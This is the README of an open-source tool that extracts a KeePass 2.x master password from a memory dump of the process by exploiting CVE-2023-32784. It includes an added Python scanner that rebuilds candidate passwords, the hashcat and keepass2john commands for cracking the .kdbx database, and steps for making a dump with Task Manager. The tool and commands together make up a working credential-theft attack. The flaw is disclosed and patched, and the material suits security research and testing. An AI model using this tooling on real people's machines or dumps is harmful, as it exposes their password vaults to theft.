Find and collect parts of a Keepass master key to recover it in plain text from a memory dump

JorianWoltjer/keepass-dump-extractor

KeePass Memory Dump Extractor

While the master key is being typed into the unlock dialog, the contents of the password box are kept in memory. The box visually hides the input with '●' characters, but for every keystroke a string consisting of the '●' placeholders for the already typed characters followed by the newly typed character is left behind in memory and is never cleared (CVE-2023-32784, fixed in KeePass 2.54, released June 3rd 2023). That makes it possible to find strings like the following in a memory dump of the process:

s
●e
●●c
●●●r
●●●●e
●●●●●t

This tool finds such strings and combines them into one password. Because of noise in the dump and retyped or corrected input, it will also print some false positives (especially for the earlier characters), but with brute-forcing or a bit of common sense these are easy to filter out.

It differs from existing tools (like keepass-password-dumper or keepass-dump-masterkey) in speed, in its several useful output formats, and in its ability to extract non-ASCII characters from the UTF-16 encoded strings. If the master key contains Unicode characters like 'ø', this tool will find those too (iykyk).

Installation

cargo install keepass-dump-extractor

Or download and extract a pre-compiled binary from the Releases page.

Common usage

This attack requires a memory dump of the KeePass process; from it the tool can generate all possible master keys for unlocking the KeePass database file (.kdbx). With the following commands you generate a wordlist, extract the hash from the database, and crack it with that wordlist:

keepass-dump-extractor KeePass.DMP -f all > wordlist.txt

keepass2john passwords.kdbx > passwords.kdbx.hash
hashcat -m 13400 --username passwords.kdbx.hash wordlist.txt

Within a few seconds you should be able to find the password this way, provided most of the typed master key was inside the memory dump. (--username is passed because keepass2john prefixes each hash with the database file name.) In more complex cases with limited information, the other output formats let you work out manually what fits.

Output Formats

The -f (--format) option allows you to choose an output format that fits your use case the best. Here are its possible values:

Warning

The following output examples were made clearer by artificially adding the first character. In reality the first character cannot be recovered: it is typed before any '●' placeholder exists, so the single-character string it leaves behind cannot be recognized in the memory dump by a '●' prefix.

found (default): Directly print all hints about the password

Results are deduplicated, and the alternatives for a position are ordered by number of occurrences, so the first one listed is likely the correct character.
For example:

s
●e
●3
●●c
●●●r
●●●●e
●●●●3
●●●●●t

gaps: Summarize the hints into the full size, leaving gaps for unknown characters

Positions are grouped so that one position is permuted at a time, while every other ambiguous or unknown position is left as a '●' gap. Within a position the alternatives are ordered by number of occurrences, so the first one is likely the correct one. Useful for manually comparing which letter fits best between the known letters.
For example:

secr●t
s3cr●t
s●cret
s●cr3t

all: Print all possible permutations of the password

The alternatives for the unknown positions are expanded into their cartesian product, so every possible password is output. This is useful for generating a wordlist for cracking tools like hashcat.
For example:

secret
s3cret
secr3t
s3cr3t

raw: Write the raw results with all found information

Print the raw results as the tool parses them: one tab-separated line per finding with the number of occurrences, the 0-based position, and the character. This is useful for scripts, and it is the only format that shows how many times a character occurred at a position; the other formats only expose that through their ordering.
For example:

10	0	s
10	1	e
2	1	3
10	2	c
10	3	r
1	4	3
10	4	e
10	5	t
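
The scanning and output logic described in this section, written out as an added Python example that is not the project's own (Rust) code: it searches a byte string for UTF-16LE runs of '●' (U+25CF, bytes CF 25) followed by one more code unit, counts each (position, character) pair, and renders the found, gaps, all and raw formats. SAMPLE_DUMP is a constructed stand-in for a real KeePass.DMP built by the hypothetical build_dump helper, and the fill argument of fmt_all is this example's own way of brute-forcing the unrecoverable first character; neither exists in the tool.

```python
"""Scan a memory dump for the '●●●c' leftovers of the KeePass 2.x
master-password box and rebuild candidate passwords (added example)."""
import re
from collections import Counter
from itertools import product

BULLET = "\u25cf"                         # '●', the placeholder the password box draws
BULLET_LE = BULLET.encode("utf-16-le")    # b'\xcf\x25' inside a .NET (UTF-16LE) string

# A run of one or more bullets followed by one more code unit: the bullets are
# the already-hidden prefix, the trailing code unit is the character that was
# just typed. The first character has no bullet prefix and so never matches.
PATTERN = re.compile(rb"((?:\xcf\x25)+)(..)", re.DOTALL)


def scan_dump(data: bytes) -> Counter:
    """Map (position, character) -> number of times it was seen in `data`."""
    hits: Counter = Counter()
    for m in PATTERN.finditer(data):
        pos = len(m.group(1)) // 2            # bullet count == index of the char
        try:
            ch = m.group(2).decode("utf-16-le")
        except UnicodeDecodeError:            # lone surrogate half: noise
            continue
        if not ch.isprintable():              # NUL, control code units: noise
            continue
        hits[(pos, ch)] += 1
    return hits


def candidates(hits: Counter) -> dict:
    """Per position, the characters seen there, most frequent first."""
    by_pos = {}
    for (pos, ch), n in hits.items():
        by_pos.setdefault(pos, []).append((ch, n))
    return {pos: [ch for ch, _ in sorted(lst, key=lambda t: (-t[1], t[0]))]
            for pos, lst in sorted(by_pos.items())}


def fmt_found(cands: dict) -> list:
    """'found' format: every hint as bullets followed by the character."""
    return [BULLET * pos + ch for pos in cands for ch in cands[pos]]


def fmt_gaps(cands: dict, length: int) -> list:
    """'gaps' format: vary one ambiguous position at a time, other unsettled
    positions (including the never-seen first one) stay as '●'."""
    fixed = [cands[p][0] if len(cands.get(p, [])) == 1 else BULLET
             for p in range(length)]
    lines = []
    for pos in range(length):
        if len(cands.get(pos, [])) < 2:
            continue
        for ch in cands[pos]:
            lines.append("".join(ch if p == pos else fixed[p] for p in range(length)))
    return lines or ["".join(fixed)]


def fmt_all(cands: dict, length: int, fill: str = "") -> list:
    """'all' format: cartesian product of the candidates. A position with no
    candidates (typically position 0) takes the characters of `fill`; with an
    empty `fill` the product is empty, so pass the alphabet to brute-force."""
    slots = [cands.get(p) or list(fill) for p in range(length)]
    return ["".join(t) for t in product(*slots)]


def fmt_raw(hits: Counter) -> list:
    """'raw' format: count<TAB>position<TAB>character."""
    order = sorted(hits.items(), key=lambda kv: (kv[0][0], -kv[1], kv[0][1]))
    return [f"{n}\t{pos}\t{ch}" for (pos, ch), n in order]


def build_dump(typings: list) -> bytes:
    """Constructed stand-in for KeePass.DMP (hypothetical helper): for each
    (password, times) pair, the per-keystroke leftovers as UTF-16LE strings,
    separated by unrelated bytes, including one bullet+NUL false positive."""
    junk = [b"MZ\x90\x00\x03", "Open Database".encode("utf-16-le"),
            BULLET_LE + b"\x00\x00"]
    out = bytearray()
    for word, times in typings:
        for _ in range(times):
            for i in range(1, len(word)):
                out += junk[i % len(junk)]
                out += (BULLET * i + word[i]).encode("utf-16-le")
    return bytes(out)


# Constructed sample: ten clean typings, two with a typo, one non-ASCII slip.
SAMPLE_DUMP = build_dump([("secret", 10), ("s3cret", 2), ("secrøt", 1)])

if __name__ == "__main__":
    hits = scan_dump(SAMPLE_DUMP)
    cands = candidates(hits)
    length = max(cands) + 1
    for name, lines in [("found", fmt_found(cands)), ("gaps", fmt_gaps(cands, length)),
                        ("all (fill='s')", fmt_all(cands, length, fill="s")),
                        ("raw", fmt_raw(hits))]:
        print(f"--- {name} ---")
        print("\n".join(lines))
```

The byte regex is not aligned to 2-byte boundaries, so unrelated data that happens to contain CF 25 produces extra hits; the printable filter removes the obvious ones and the occurrence counts rank the rest, which is the same reason the tool's output contains false positives. Instead of filling position 0 in the wordlist, hashcat's hybrid mask+wordlist mode (-a 7) can prepend a mask such as ?a to each candidate at cracking time.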

Testing

To try out this tool and create your own memory dump, install a KeePass version older than 2.54, such as 2.53. Once installed, open the program and create and save a database in the .kdbx format.

Then, to set up the memory dump, close and re-open the database file, which prompts for the password. Type the master key you set for the database and unlock it. You can lock it again afterwards if you want to.

Now generate a memory dump of the KeePass.exe process with Task Manager: right-click the process and choose "Create dump file":

[Screenshot: the "Create dump file" context-menu option in Task Manager on the KeePass process]

When this is done, open the file location and run this tool on the resulting .DMP file.
